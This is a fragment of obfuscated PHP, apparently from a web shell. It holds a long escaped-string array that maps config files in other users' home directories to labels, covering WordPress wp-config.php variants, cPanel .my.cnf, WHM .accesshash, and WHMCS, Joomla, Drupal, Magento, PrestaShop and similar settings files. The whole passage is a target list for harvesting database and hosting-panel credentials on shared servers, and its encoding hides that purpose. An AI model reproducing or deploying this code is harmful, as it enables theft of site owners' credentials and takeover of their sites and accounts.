"\x2f\x68\x6f\155\145\x32\57{$user_cox}\57\x70\165\x62\154\151\143\137\x68\x74\155\154\x2f\x62\x6c\x6f\x67\x73\57\167\160\55\x63\157\x6e\146\x69\x67\x2e\x70\x68\160" => "\x57\157\162\x64\120\162\x65\x73\x73\x42\154\157\147\x73", "\57\x68\157\x6d\x65\x32\57{$user_cox}\x2f\x70\x75\x62\154\151\143\137\x68\x74\155\154\57\x62\145\164\x61\x2f\167\x70\55\x63\157\x6e\146\x69\147\x2e\x70\150\x70" => "\x57\157\x72\144\x50\162\145\x73\163\x42\x65\x74\x61", "\x2f\150\x6f\x6d\x65\62\x2f{$user_cox}\57\160\x75\142\x6c\x69\x63\137\150\x74\x6d\x6c\x2f\102\145\164\141\57\x77\160\x2d\143\157\156\x66\151\x67\56\x70\x68\x70" => "\x57\157\x72\144\x50\162\x65\163\x73\102\x65\x74\x61", "\57\150\x6f\x6d\145\62\x2f{$user_cox}\57\x70\x75\x62\x6c\151\x63\x5f\150\164\155\x6c\57\x42\105\x54\x41\x2f\x77\x70\55\x63\x6f\156\146\151\x67\56\x70\150\160" => "\x57\157\162\x64\120\162\145\163\x73\102\x65\x74\x61", "\57\x68\x6f\x6d\145\x32\x2f{$user_cox}\x2f\x70\165\142\x6c\x69\x63\x5f\150\x74\x6d\x6c\57\x50\x52\105\x53\123\57\x77\160\x2d\143\157\x6e\x66\151\x67\x2e\160\150\x70" => "\x57\157\162\x64\x50\x72\x65\x73\163\x50\162\145\163\163", "\57\150\x6f\x6d\x65\62\57{$user_cox}\x2f\x70\165\142\154\x69\x63\137\150\164\x6d\x6c\57\120\162\145\163\163\57\x77\x70\55\x63\157\156\146\x69\x67\56\x70\150\160" => "\x57\157\x72\144\x50\162\145\x73\163\120\162\145\163\x73", "\57\150\x6f\x6d\x65\x32\57{$user_cox}\57\x70\165\x62\154\151\x63\137\150\164\x6d\x6c\57\x70\x72\145\163\163\x2f\167\x70\55\x63\157\x6e\146\151\147\x2e\x70\150\x70" => "\127\157\x72\144\120\x72\x65\163\x73\120\162\145\163\x73", "\x2f\x68\x6f\155\145\x32\x2f{$user_cox}\57\160\165\142\154\x69\x63\x5f\x68\164\x6d\x6c\57\x57\160\x2f\167\x70\55\x63\x6f\156\146\x69\147\56\x70\x68\x70" => "\127\157\x72\x64\x50\x72\x65\163\x73\127\160", "\x2f\150\x6f\x6d\x65\62\x2f{$user_cox}\57\160\165\x62\x6c\151\143\x5f\150\164\155\x6c\57\167\160\57\167\160\55\x63\157\156\x66\x69\x67\x2e\160\x68\x70" => "\x57\x6f\162\x64\x50\x72\x65\163\163\127\160", "\57\x68\157\155\x65\62\57{$user_cox}\57\x70\x75\142\x6c\151\143\137\x68\x74\155\x6c\57\127\x50\x2f\167\160\x2d\143\157\x6e\x66\x69\x67\x2e\x70\150\160" => "\127\x6f\162\x64\x50\162\145\x73\x73\x57\120", "\x2f\x68\157\x6d\x65\x32\57{$user_cox}\57\x70\165\142\x6c\x69\143\137\x68\164\x6d\x6c\57\160\x6f\x72\164\x61\x6c\x2f\167\160\55\143\157\x6e\146\x69\147\56\x70\150\x70" => "\127\x6f\x72\x64\120\x72\145\x73\163\120\x6f\x72\164\x61\x6c", "\57\150\x6f\x6d\x65\62\57{$user_cox}\57\160\x75\x62\154\x69\x63\x5f\150\164\x6d\x6c\x2f\120\117\122\124\101\x4c\x2f\x77\160\x2d\143\x6f\156\x66\151\x67\56\160\150\160" => "\x57\x6f\162\144\x50\x72\x65\163\163\120\x6f\x72\164\141\x6c", "\57\x68\x6f\155\x65\62\x2f{$user_cox}\57\x70\165\x62\154\x69\x63\137\x68\164\155\x6c\x2f\120\157\x72\x74\141\154\x2f\x77\x70\55\143\157\x6e\146\x69\147\x2e\x70\150\160" => "\x57\157\x72\144\x50\162\x65\163\x73\120\x6f\x72\164\x61\154", "\x2f\x68\157\x6d\145\x33\x2f{$user_cox}\x2f\56\155\171\56\143\156\x66" => "\x63\x70\141\x6e\x65\154", "\x2f\150\x6f\155\145\x33\x2f{$user_cox}\57\x2e\x61\143\143\145\x73\163\x68\141\163\150" => "\127\110\115\x2d\141\143\143\x65\x73\x73\150\141\163\x68", "\57\x68\x6f\155\x65\63\x2f{$user_cox}\x2f\160\x75\142\154\151\143\x5f\150\164\155\x6c\x2f\142\167\x2d\x63\x6f\x6e\146\151\x67\163\x2f\143\157\x6e\x66\151\147\56\151\156\x69" => "\x42\x6f\x73\x57\145\x62", "\57\x68\x6f\155\x65\x33\57{$user_cox}\x2f\160\x75\142\154\x69\x63\x5f\150\164\155\x6c\x2f\x63\157\x6e\x66\x69\147\57\153\157\x6e\x65\153\163\151\56\160\150\160" => "\x4c\x6f\153\x6f\155\145\144\x69\x61", "\x2f\x68\157\155\x65\63\57{$user_cox}\x2f\160\x75\142\x6c\151\x63\x5f\x68\164\x6d\x6c\x2f\x6c\157\153\157\155\x65\144\x69\x61\x2f\143\157\x6e\146\151\x67\x2f\153\x6f\x6e\x65\153\x73\x69\56\x70\150\160" => "\114\157\x6b\157\x6d\145\144\151\x61", "\x2f\150\157\x6d\x65\63\x2f{$user_cox}\x2f\x70\x75\x62\154\x69\x63\x5f\150\164\x6d\x6c\57\x63\x6c\x69\145\x6e\x74\141\162\145\141\x2f\x63\157\x6e\146\x69\x67\165\162\x61\x74\151\x6f\156\56\160\x68\160" => "\127\110\115\x43\x53", "\57\x68\157\x6d\145\x33\x2f{$user_cox}\57\160\165\x62\x6c\x69\143\137\150\x74\155\x6c\57\x77\x68\x6d\143\163\x2f\x63\157\156\146\151\x67\165\162\x61\164\x69\x6f\156\x2e\160\150\160" => "\x57\110\115\103\123", "\57\x68\x6f\155\145\63\57{$user_cox}\57\160\165\x62\x6c\151\143\137\x68\x74\x6d\154\57\x66\157\162\165\155\57\143\x6f\156\146\151\x67\x2e\x70\x68\x70" => "\x70\x68\160\102\102", "\57\150\x6f\155\x65\63\57{$user_cox}\x2f\x70\165\142\154\151\x63\x5f\150\x74\155\x6c\57\x73\x69\164\145\163\57\144\145\146\x61\x75\154\164\x2f\163\145\x74\x74\151\x6e\x67\163\x2e\x70\150\160" => "\104\x72\165\x70\141\154", "\57\150\x6f\x6d\145\63\57{$user_cox}\x2f\160\165\x62\x6c\151\x63\x5f\x68\164\x6d\x6c\x2f\143\x6f\156\146\x69\x67\57\x73\145\x74\164\151\x6e\147\163\x2e\151\156\143\x2e\160\150\160" => "\120\162\x65\163\164\141\123\x68\x6f\x70", "\57\x68\x6f\155\145\63\x2f{$user_cox}\x2f\160\165\x62\154\x69\143\x5f\x68\x74\x6d\154\x2f\x61\160\x70\57\145\x74\x63\57\x6c\157\143\x61\x6c\56\x78\155\154" => "\115\x61\x67\145\x6e\x74\157", "\57\x68\x6f\x6d\145\x33\x2f{$user_cox}\x2f\160\x75\x62\154\x69\143\137\150\164\x6d\154\57\141\x64\155\151\x6e\57\143\157\156\x66\151\147\x2e\x70\150\x70" => "\x4f\160\x65\156\103\x61\162\x74", "\x2f\x68\x6f\x6d\145\63\57{$user_cox}\57\160\x75\x62\x6c\151\143\137\150\x74\x6d\154\57\x73\154\143\157\156\146\x69\147\x2e\x70\x68\x70" => "\123\x69\164\145\x6c\x6f\153", "\57\x68\157\155\x65\63\x2f{$user_cox}\x2f\x70\x75\x62\x6c\151\x63\x5f\x68\x74\155\x6c\57\x61\160\160\154\151\143\x61\164\151\x6f\x6e\x2f\143\x6f\x6e\146\x69\147\57\144\141\x74\141\142\141\x73\x65\x2e\160\150\160" => "\x45\x6c\x6c\x69\x73\x6c\x61\x62", "\x2f\150\157\x6d\x65\x33\x2f{$user_cox}\57\x70\x75\142\154\x69\143\137\150\164\155\154\57\167\150\155\x2f\143\157\x6e\146\151\147\165\162\141\164\151\x6f\x6e\56\x70\x68\x70" => "\127\110\x4d\x43\x53", "\x2f\x68\x6f\155\x65\x33\x2f{$user_cox}\57\160\x75\x62\x6c\151\x63\137\x68\x74\155\154\x2f\x77\150\155\143\57\127\x48\x4d\x2f\143\x6f\156\x66\151\147\x75\x72\x61\x74\x69\x6f\x6e\56\x70\x68" => "\127\110\x4d\x43", "\x2f\150\x6f\x6d\145\63\57{$user_cox}\57\x70\x75\x62\154\151\143\137\x68\164\x6d\154\57\x63\x65\156\164\x72\141\x6c\x2f\x63\x6f\x6e\x66\x69\x67\165\162\x61\x74\151\157\x6e\56\x70\150\160" => "\127\110\x4d\40\103\145\x6e\x74\x72\141\154", "\x2f\x68\157\x6d\145\x33\57{$user_cox}\x2f\x70\x75\x62\x6c\x69\143\137\x68\164\155\x6c\x2f\x77\150\x6d\57\x57\110\115\x43\x53\x2f\143\157\156\x66\x69\x67\x75\x72\141\x74\151\x6f\x6e\x2e\x70\150\160" => "\127\110\115\x43\x53", "\x2f\x68\x6f\x6d\x65\63\x2f{$user_cox}\x2f\x70\x75\x62\x6c\151\x63\137\x68\164\155\x6c\x2f\x77\x68\155\57\x77\150\155\x63\163\57\x63\x6f\156\x66\x69\147\x75\162\141\x74\151\x6f\x6e\56\160\150\160" => "\x57\x48\x4d\103\123", "\x2f\x68\x6f\155\145\x33\x2f{$user_cox}\57\x70\165\x62\154\151\143\x5f\150\x74\x6d\x6c\x2f\163\x75\x62\x6d\x69\x74\x74\x69\x63\153\x65\x74\56\x70\x68\160" => "\127\110\115\x43\x53", "\x2f\x68\x6f\x6d\145\x33\57{$user_cox}\57\160\165\x62\x6c\151\143\137\150\x74\x6d\154\x2f\x63\157\x6e\146\x69\147\x75\x72\141\x74\x69\157\156\x2e\160\x68\160" => "\112\157\x6f\155\154\141", "\x2f\x68\157\x6d\145\x33\x2f{$user_cox}\x2f\x70\x75\142\x6c\x69\x63\x5f\x68\x74\155\154\x2f\x4a\x6f\x6f\x6d\154\141\57\143\x6f\x6e\x66\151\147\165\x72\141\164\151\x6f\x6e\x2e\160\x68\160" => "\x4a\x6f\x6f\155\x6c\141\x4a\x6f\157\155\x6c\x61", "\x2f\150\157\x6d\x65\x33\57{$user_cox}\57\160\165\142\x6c\151\x63\x5f\150\164\155\154\x2f\152\157\x6f\x6d\154\x61\x2f\143\x6f\156\146\151\x67\165\x72\141\164\151\157\x6e\x2e\x70\x68\x70" => "\x4a\157\157\155\154\x61\112\157\x6f\155\x6c\x61", "\57\x68\x6f\155\x65\63\57{$user_cox}\x2f\x70\x75\142\154\x69\143\x5f\x68\164\155\x6c\x2f\112\x4f\x4f\115\114\x41\57\143\157\x6e\x66\151\x67\x75\x72\x61\164\151\157\156\x2e\160\x68\x70" => "\112\157\157\155\x6c\141\x4a\157\157\x6d\x6c\x61", "\57\150\x6f\155\x65\x33\x2f{$user_cox}\x2f\x70\165\142\x6c\x69\x63\137\x68\x74\155\x6c\x2f\x48\157\x6d\x65\x2f\x63\157\156\146\x69\x67\165\162\x61\164\x69\x6f\156\56\x70\150\x70" => "\112\x6f\157\x6d\x6c\x61\110\157\155\x65", "\57\x68\157\155\x65\x33\57{$user_cox}\57\160\165\x62\x6c\151\143\137\150\164\155\x6c\x2f\110\117\115\x45\57\x63\x6f\x6e\146\x69\147\165\x72\x61\x74\151\157\x6e\56\x70\x68\160" => "\x4a\x6f\x6f\x6d\x6c\x61\110\x6f\155\x65", "\x2f\x68\x6f\155\x65\x33\x2f{$user_cox}\x2f\x70\x75\x62\x6c\x69\x63\x5f\x68\x74\155\154\57\x68\x6f\x6d\145\57\x63\x6f\x6e\x66\151\x67\165\x72\141\164\151\157\x6e\x2e\x70\150\x70" => "\112\x6f\x6f\155\x6c\141\x48\157\155\145", "\57\150\157\155\145\x33\x2f{$user_cox}\x2f\x70\165\x62\x6c\x69\x63\x5f\150\x74\155\x6c\x2f\x4e\105\127\57\x63\157\x6e\146\x69\x67\165\x72\141\164\x69\157\156\x2e\160\x68\x70" => "\112\x6f\x6f\155\154\141\116\145\167", "\57\150\x6f\155\145\63\x2f{$user_cox}\57\x70\x75\x62\x6c\x69\x63\x5f\x68\164\x6d\x6c\x2f\116\x65\x77\x2f\143\157\156\x66\151\x67\165\x72\x61\x74\151\x6f\x6e\x2e\x70\x68\x70" => "\112\157\x6f\155\x6c\x61\x4e\145\167", "\57\x68\157\155\145\x33\57{$user_cox}\x2f\160\x75\x62\x6c\x69\x63\x5f\x68\164\155\154\x2f\x6e\x65\167\57\x63\157\x6e\x66\151\147\x75\162\141\x74\151\x6f\x6e\56\160\150\160" => "\x4a\x6f\x6f\x6d\154\x61\116\x65\x77", "\57\x68\157\x6d\145\x33\x2f{$user_cox}\57\160\x75\x62\x6c\151\143\137\x68\164\155\154\57\116\x65\167\x73\57\143\157\x6e\146\151\x67\x75\x72\x61\164\x69\x6f\x6e\x2e\x70\x68\x70" => "\x4a\157\157\x6d\x6c\x61\x4e\145\167\x73", "\x2f\150\157\155\x65\63\x2f{$user_cox}\57\160\x75\x62\x6c\x69\143\x5f\150\x74\x6d\x6c\57\116\105\127\x53\57\143\x6f\x6e\x66\x69\147\x75\x72\141\x74\x69\x6f\156\x2e\160\x68\160" => "\112\157\x6f\x6d\x6c\x61\x4e\145\x77\x73", "\x2f\150\x6f\x6d\145\x33\57{$user_cox}\x2f\x70\165\x62\x6c\x69\143\137\x68\164\x6d\x6c\x2f\156\x65\x77\x73\x2f\x63\157\x6e\x66\151\x67\x75\x72\141\164\151\x6f\156\x2e\x70\x68\x70" => "\x4a\157\157\x6d\154\x61\116\145\x77\163", "\57\x68\x6f\x6d\x65\63\x2f{$user_cox}\x2f\x70\x75\142\x6c\151\x63\x5f\150\x74\x6d\x6c\57\103\155\x73\x2f\143\x6f\156\x66\x69\147\x75\162\x61\164\151\157\156\56\160\x68\x70" => "\x4a\x6f\x6f\x6d\154\x61\x43\x6d\163", "\57\x68\x6f\x6d\145\63\57{$user_cox}\57\x70\165\142\154\151\x63\x5f\150\164\155\154\x2f\103\x4d\123\x2f\143\157\x6e\x66\151\147\x75\x72\x61\x74\151\157\156\x2e\160\150\160" => "\x4a\x6f\x6f\155\x6c\141\x43\x6d\163", "\57\150\157\x6d\x65\63\x2f{$user_cox}\57\160\x75\142\154\x69\143\137\150\164\155\x6c\57\143\155\163\x2f\143\157\x6e\146\151\147\165\x72\141\164\x69\157\x6e\56\160\x68\160" => "\112\157\x6f\x6d\x6c\x61\x43\155\x73", "\57\150\x6f\x6d\145\63\x2f{$user_cox}\57\160\165\x62\154\x69\x63\137\150\164\x6d\x6c\57\115\141\x69\x6e\57\143\157\x6e\146\x69\147\165\x72\141\x74\151\157\156\x2e\x70\x68\160" => "\112\x6f\x6f\155\154\x61\115\x61\x69\156", "\x2f\150\x6f\155\145\63\x2f{$user_cox}\57\x70\x75\142\154\x69\x63\x5f\x68\164\155\154\x2f\x4d\101\x49\x4e\x2f\x63\x6f\156\x66\x69\147\165\x72\x61\x74\x69\157\156\x2e\x70\150\x70" => "\x4a\x6f\157\x6d\x6c\x61\x4d\x61\151\156", "\x2f\x68\157\x6d\145\x33\x2f{$user_cox}\57\160\165\142\x6c\151\x63\x5f\150\164\x6d\x6c\57\155\141\151\x6e\x2f\143\157\156\x66\x69\147\165\162\141\164\x69\157\x6e\x2e\x70\x68\160" => "\112\157\x6f\x6d\x6c\x61\x4d\141\x69\156", "\57\x68\x6f\155\145\63\x2f{$user_cox}\57\160\165\x62\x6c\151\x63\137\x68\164\155\x6c\57\x42\154\x6f\147\57\143\x6f\x6e\x66\x69\x67\165\162\141\x74\151\x6f\x6e\56\160\150\x70" => "\x4a\x6f\x6f\155\x6c\x61\102\154\157\x67", "\x2f\x68\157\x6d\145\x33\57{$user_cox}\x2f\160\x75\142\154\151\143\137\150\x74\155\154\57\x42\x4c\117\x47\x2f\x63\x6f\x6e\146\151\x67\165\x72\141\x74\x69\x6f\x6e\56\x70\x68\x70" => "\112\157\157\x6d\154\x61\x42\154\157\147", "\57\x68\x6f\155\145\63\x2f{$user_cox}\57\160\165\142\154\x69\x63\x5f\150\x74\x6d\x6c\x2f\x62\154\x6f\147\57\x63\157\x6e\146\x69\147\165\162\x61\x74\151\157\x6e\56\x70\150\x70" => "\x4a\157\157\155\154\x61\102\154\157\x67", "\57\150\157\x6d\145\x33\x2f{$user_cox}\57\x70\x75\x62\x6c\x69\x63\137\150\164\155\x6c\57\102\154\x6f\147\x73\x2f\x63\157\156\146\151\x67\x75\162\141\x74\151\x6f\156\56\x70\150\160" => "\x4a\x6f\157\x6d\154\x61\x42\x6c\x6f\147\x73", "\57\x68\x6f\155\145\x33\x2f{$user_cox}\57\160\165\x62\154\151\x63\x5f\150\x74\x6d\x6c\57\x42\x4c\117\107\x53\57\x63\x6f\156\146\x69\x67\x75\x72\141\164\151\x6f\156\56\x70\150\160" => "\112\x6f\157\155\154\x61\102\154\x6f\147\163", "\57\150\157\155\x65\63\x2f{$user_cox}\57\x70\165\142\154\151\143\137\150\164\x6d\154\x2f\142\x6c\x6f\147\x73\x2f\x63\x6f\156\x66\151\x67\x75\162\x61\x74\151\157\x6e\56\x70\150\x70" => "\x4a\157\157\155\154\x61\x42\154\x6f\x67\x73", "\x2f\150\157\155\x65\x33\57{$user_cox}\x2f\x70\x75\142\154\151\x63\137\x68\x74\155\x6c\57\x62\145\x74\x61\x2f\143\157\156\x66\x69\147\x75\x72\141\x74\151\x6f\x6e\56\160\150\160" => "\112\157\x6f\x6d\x6c\x61\102\145\x74\x61", "\x2f\150\157\x6d\x65\x33\57{$user_cox}\x2f\160\x75\142\154\151\x63\x5f\x68\x74\x6d\x6c\57\x42\145\164\141\x2f\x63\157\156\146\x69\147\165\x72\141\164\x69\x6f\x6e\x2e\160\150\160" => "\112\x6f\157\x6d\x6c\x61\x42\145\x74\141", "\57\x68\x6f\x6d\145\x33\x2f{$user_cox}\x2f\x70\x75\142\x6c\x69\x63\137\150\x74\155\x6c\x2f\x42\x45\124\101\x2f\x63\157\156\x66\x69\147\x75\x72\141\164\151\157\x6e\x2e\x70\150\160" => "\x4a\157\x6f\155\154\x61\102\x65\164\141", "\x2f\150\x6f\155\x65\x33\57{$user_cox}\x2f\160\x75\x62\154\x69\x63\x5f\x68\164\155\154\x2f\x50\122\x45\123\123\x2f\143\x6f\x6e\x66\151\147\165\162\x61\x74\x69\x6f\x6e\x2e\160\x68\160" => "\x4a\157\157\x6d\154\141\x50\x72\145\163\163", "\57\x68\157\x6d\x65\x33\x2f{$user_cox}\57\x70\x75\142\154\151\143\x5f\150\x74\155\154\57\x50\162\145\163\x73\57\x63\x6f\156\x66\x69\x67\165\162\141\x74\x69\x6f\156\56\160\x68\160" => "\x4a\x6f\157\155\x6c\141\x50\x72\x65\163\x73", "\57\x68\157\x6d\x65\63\57{$user_cox}\x2f\x70\x75\142\154\x69\143\137\150\x74\x6d\154\x2f\x70\162\145\x73\x73\57\x63\157\156\x66\x69\x67\165\x72\x61\164\x69\x6f\x6e\56\x70\x68\x70" => "\x4a\x6f\157\155\154\141\120\162\145\163\x73", "\57\x68\x6f\x6d\145\63\57{$user_cox}\57\x70\165\142\x6c\151\x63\137\x68\164\x6d\x6c\x2f\x57\x70\57\143\157\156\x66\x69\147\165\162\x61\x74\x69\x6f\156\x2e\160\150\x70" => "\112\157\157\x6d\x6c\x61\x57\x70", "\x2f\150\157\x6d\x65\x33\57{$user_cox}\x2f\x70\x75\142\x6c\151\143\137\150\164\155\x6c\57\x77\x70\57\x63\157\156\146\x69\147\x75\x72\141\x74\151\x6f\156\x2e\160\x68\160" => "\x4a\x6f\157\x6d\x6c\x61\127\160", "\57\150\157\155\145\x33\57{$user_cox}\57\160\165\x62\x6c\151\143\137\x68\164\x6d\x6c\57\127\120\57\x63\x6f\156\x66\151\147\165\x72\141\x74\151\157\156\56\160\150\160" => "\112\157\x6f\155\x6c\141\127\x50", "\x2f\x68\x6f\x6d\x65\x33\x2f{$user_cox}\57\160\x75\142\x6c\151\143\137\150\x74\155\x6c\57\160\x6f\x72\x74\141\x6c\x2f\x63\157\156\146\x69\x67\x75\x72\141\164\151\x6f\x6e\x2e\x70\x68\x70" => "\112\157\157\155\154\x61\x50\x6f\162\164\x61\x6c", "\x2f\150\x6f\155\145\63\57{$user_cox}\x2f\160\x75\142\154\x69\x63\137\x68\164\155\154\x2f\120\117\x52\124\x41\114\57\143\x6f\x6e\146\151\x67\x75\162\141\164\151\x6f\156\56\160\150\160" => "\x4a\157\157\155\154\141\120\x6f\162\x74\141\154", "\x2f\x68\x6f\x6d\x65\x33\57{$user_cox}\57\x70\165\142\154\x69\x63\137\x68\x74\x6d\154\57\x50\157\162\164\141\154\57\143\x6f\x6e\x66\x69\x67\165\x72\141\164\151\157\156\56\160\x68\160" => "\x4a\x6f\x6f\x6d\x6c\141\120\157\x72\164\141\154", "\57\x68\x6f\155\x65\63\57{$user_cox}\x2f\160\165\x62\154\151\x63\137\150\164\x6d\154\57\x77\x70\55\143\x6f\156\x66\x69\x67\x2e\x70\x68\160" => "\127\157\162\144\120\162\x65\163\163", "\x2f\150\157\155\x65\x33\x2f{$user_cox}\x2f\160\x75\142\x6c\x69\x63\x5f\x68\x74\x6d\154\x2f\167\x6f\x72\144\x70\162\145\x73\163\57\167\x70\x2d\143\157\156\146\151\x67\56\160\x68\160" => "\x57\157\x72\x64\x50\162\145\x73\x73\127\x6f\162\x64\160\162\x65\x73\x73", "\x2f\x68\157\x6d\145\x33\x2f{$user_cox}\57\160\165\x62\x6c\151\x63\x5f\150\164\x6d\x6c\x2f\127\157\x72\144\160\x72\145\x73\163\x2f\x77\x70\55\143\157\156\146\x69\147\56\160\150\160" => "\x57\157\x72\x64\x50\x72\x65\x73\x73\x57\157\162\144\x70\x72\x65\163\x73", "\x2f\x68\x6f\x6d\145\63\57{$user_cox}\57\x70\x75\142\x6c\x69\143\137\x68\164\x6d\154\57\127\x4f\x52\x44\120\x52\x45\x53\x53\57\167\160\55\143\157\x6e\x66\151\147\x2e\160\x68\160" => "\x57\x6f\x72\144\120\162\x65\163\163\x57\x6f\x72\144\x70\162\x65\163\x73", "\57\x68\157\155\x65\63\57{$user_cox}\x2f\x70\165\142\x6c\x69\143\137\150\x74\x6d\154\57\110\x6f\155\145\x2f\167\160\55\143\x6f\x6e\146\x69\x67\56\x70\x68\160" => "\x57\x6f\x72\x64\120\162\x65\x73\x73\110\x6f\x6d\145", "\x2f\x68\157\x6d\x65\63\57{$user_cox}\x2f\160\x75\142\x6c\151\x63\137\x68\x74\x6d\154\57\x48\x4f\115\105\57\x77\160\x2d\143\157\x6e\x66\151\147\56\x70\150\160" => "\x57\157\162\x64\x50\162\145\x73\163\x48\157\155\x65", "\57\150\x6f\155\145\63\57{$user_cox}\x2f\x70\165\142\x6c\151\143\x5f\x68\164\155\x6c\57\150\157\155\145\x2f\167\x70\55\143\x6f\156\x66\151\x67\56\160\150\x70" => "\127\157\162\x64\120\162\x65\x73\x73\x48\x6f\x6d\145", "\x2f\x68\x6f\x6d\x65\63\x2f{$user_cox}\x2f\160\x75\x62\154\x69\x63\x5f\150\164\x6d\154\57\x4e\x45\127\x2f\x77\x70\55\143\157\156\146\151\x67\56\x70\x68\x70" => "\127\x6f\162\144\120\x72\145\163\163\x4e\145\x77", "\57\x68\x6f\155\x65\x33\57{$user_cox}\x2f\x70\165\142\154\x69\143\x5f\x68\164\155\154\57\116\145\167\x2f\167\160\55\143\x6f\156\146\151\x67\56\160\x68\x70" => "\x57\x6f\162\x64\120\162\145\x73\x73\x4e\x65\167", "\x2f\150\x6f\155\x65\x33\57{$user_cox}\57\x70\165\x62\154\151\143\137\150\x74\x6d\154\57\156\145\x77\x2f\x77\160\x2d\143\x6f\x6e\x66\x69\147\x2e\x70\150\160" => "\x57\157\x72\x64\x50\x72\x65\x73\x73\x4e\x65\x77", "\x2f\x68\x6f\x6d\x65\63\x2f{$user_cox}\x2f\160\165\x62\154\151\143\x5f\150\164\155\x6c\x2f\116\145\x77\x73\x2f\x77\160\55\x63\157\x6e\x66\x69\147\x2e\x70\x68\x70" => "\x57\157\x72\144\x50\162\x65\x73\163\x4e\x65\x77\x73", "\x2f\x68\x6f\155\145\63\x2f{$user_cox}\57\x70\165\x62\154\x69\x63\x5f\x68\x74\155\x6c\57\116\105\x57\123\57\x77\160\x2d\143\157\156\x66\x69\x67\56\160\150\160" => "\x57\x6f\162\x64\120\x72\x65\163\x73\116\145\x77\x73", "\57\150\157\x6d\x65\x33\x2f{$user_cox}\x2f\160\165\x62\x6c\151\x63\x5f\150\x74\x6d\154\x2f\156\x65\167\x73\x2f\x77\160\55\x63\157\x6e\x66\x69\147\56\x70\x68\160" => "\x57\157\x72\144\120\x72\x65\x73\x73\116\145\167\163", "\x2f\150\157\x6d\x65\63\57{$user_cox}\57\160\x75\x62\x6c\x69\143\137\x68\x74\x6d\x6c\x2f\x43\155\163\57\167\160\55\x63\157\x6e\x66\151\x67\56\160\x68\160" => "\x57\157\x72\x64\120\162\145\163\163\103\x6d\x73", "\x2f\x68\x6f\x6d\x65\x33\x2f{$user_cox}\x2f\x70\x75\142\x6c\151\x63\x5f\150\x74\155\154\57\x43\115\123\x2f\x77\160\x2d\143\157\156\146\151\147\x2e\x70\x68\x70" => "\x57\157\162\x64\x50\162\x65\163\x73\103\x6d\x73", "\x2f\150\x6f\155\x65\x33\x2f{$user_cox}\x2f\x70\165\x62\154\151\143\x5f\x68\x74\x6d\x6c\x2f\x63\x6d\163\57\x77\160\x2d\x63\x6f\156\x66\151\147\x2e\160\x68\160" => "\127\x6f\162\144\x50\162\145\x73\163\x43\155\x73", "\57\x68\157\155\145\63\57{$user_cox}\x2f\160\165\x62\154\151\x63\x5f\150\164\155\154\x2f\x4d\141\151\156\x2f\167\x70\x2d\143\157\156\146\x69\147\x2e\x70\150\160" => "\127\x6f\162\x64\x50\x72\145\x73\163\x4d\x61\151\156", "\x2f\150\x6f\x6d\145\63\57{$user_cox}\x2f\160\x75\x62\154\151\143\137\x68\164\x6d\154\x2f\115\x41\111\116\57\167\x70\x2d\x63\157\x6e\146\151\147\56\x70\150\x70" => "\127\157\162\144\120\162\x65\x73\163\115\x61\151\x6e", "\x2f\150\x6f\155\145\x33\x2f{$user_cox}\x2f\160\x75\142\154\x69\143\x5f\150\164\155\x6c\x2f\x6d\x61\x69\x6e\57\167\x70\55\143\x6f\156\146\151\x67\x2e\x70\150\160" => "\127\157\162\x64\x50\162\145\163\x73\x4d\x61\x69\x6e", "\x2f\150\x6f\155\x65\x33\x2f{$user_cox}\57\160\165\142\154\151\143\x5f\150\x74\155\x6c\x2f\x42\154\157\147\57\x77\160\x2d\143\x6f\x6e\146\x69\x67\x2e\x70\150\x70" => "\x57\157\162\x64\x50\162\145\x73\x73\102\x6c\157\x67", "\57\150\x6f\x6d\x65\63\x2f{$user_cox}\x2f\x70\165\142\x6c\x69\x63\x5f\x68\x74\155\x6c\x2f\x42\114\117\x47\x2f\167\160\55\x63\x6f\156\x66\151\x67\56\x70\150\160" => "\x57\157\162\144\x50\162\145\163\x73\102\x6c\157\x67", "\57\150\157\x6d\145\63\57{$user_cox}\x2f\x70\165\x62\154\x69\x63\137\150\164\x6d\154\x2f\x62\x6c\157\147\57\x77\x70\55\143\x6f\156\x66\151\147\56\x70\x68\160" => "\x57\157\x72\x64\x50\162\x65\x73\x73\x42\x6c\157\147", "\x2f\x68\157\155\145\x33\x2f{$user_cox}\x2f\160\165\142\x6c\x69\x63\137\150\x74\x6d\154\57\102\x6c\157\147\163\x2f\x77\x70\55\143\x6f\156\146\x69\147\56\x70\x68\160" => "\x57\157\162\144\120\x72\x65\x73\x73\x42\154\x6f\x67\x73", "\57\x68\x6f\x6d\145\x33\57{$user_cox}\57\160\x75\x62\x6c\151\143\137\x68\x74\155\154\x2f\102\114\117\x47\x53\x2f\167\x70\55\x63\157\x6e\x66\x69\147\x2e\160\x68\160" => "\x57\x6f\162\144\x50\x72\x65\163\x73\102\154\x6f\x67\163", "\57\150\x6f\155\x65\63\x2f{$user_cox}\57\x70\x75\142\x6c\x69\x63\137\150\164\155\154\57\142\x6c\157\x67\x73\57\167\x70\x2d\143\x6f\156\x66\151\x67\56\160\x68\x70" => "\x57\x6f\x72\x64\x50\162\145\x73\163\102\x6c\157\147\x73", "\x2f\x68\x6f\155\145\63\x2f{$user_cox}\57\x70\x75\142\x6c\x69\x63\137\150\x74\155\154\57\142\145\164\x61\57\167\x70\55\x63\x6f\x6e\x66\151\147\56\x70\150\160" => "\x57\157\x72\x64\x50\162\145\x73\x73\102\145\164\141", "\x2f\x68\157\x6d\145\63\57{$user_cox}\x2f\x70\x75\142\154\151\143\x5f\150\164\x6d\154\x2f\102\145\164\x61\57\167\x70\55\143\x6f\156\146\151\x67\x2e\x70\150\x70" => "\127\157\162\144\x50\x72\145\163\163\102\x65\164\x61", "\57\150\x6f\155\145\x33\57{$user_cox}\57\160\x75\x62\154\151\143\137\x68\x74\155\154\x2f\102\x45\x54\x41\57\167\x70\x2d\143\157\x6e\x66\x69\x67\x2e\160\150\160" => "\x57\x6f\x72\144\120\x72\x65\x73\163\102\145\164\x61", "\x2f\150\157\155\145\63\57{$user_cox}\x2f\160\165\142\154\151\143\137\x68\x74\155\x6c\57\x50\122\105\x53\x53\57\167\160\x2d\x63\x6f\156\x66\151\x67\x2e\160\150\160" => "\127\157\162\x64\120\x72\145\x73\x73\x50\162\x65\163\163", "\x2f\150\157\155\x65\63\57{$user_cox}\57\x70\165\142\x6c\x69\143\137\150\164\155\154\57\120\162\x65\163\163\x2f\167\x70\55\143\157\x6e\x66\151\x67\x2e\x70\x68\160" => "\x57\157\162\144\120\x72\145\x73\x73\120\x72\x65\163\163", 